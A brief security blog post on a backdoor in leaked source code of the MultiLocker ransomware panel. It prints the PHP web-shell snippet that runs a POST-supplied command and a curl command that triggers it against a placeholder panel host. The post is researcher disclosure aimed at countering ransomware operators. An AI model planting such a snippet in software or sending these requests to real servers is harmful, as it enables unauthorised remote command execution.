@botnet_hunter's blog
MultiLocker Backdoor

In a recent search through some underground communities, I came across the source code to a version of the MultiLocker panel. With ransomware, the security industry is always looking for a good way to resolve the issue without the ransom being paid. This could potentially be done by gathering information from the botnet’s panel.

While there are likely other vulnerabilities, this one stood out after a quick grep of the code. In the ‘lending/PL.php’, there is some obvious backdoor code.

if (!empty($_POST['c']))
{
system($_POST['c']);
die();
}

This can easily be accessed with curl or wget (let’s assume http://c2.panel/ is the MultiLocker panel root).

curl -v -d "c=whoami" http://c2.panel/lending/PL.php

For more information on MultiLocker, you can check out a great blog post on it here.

Design pdevty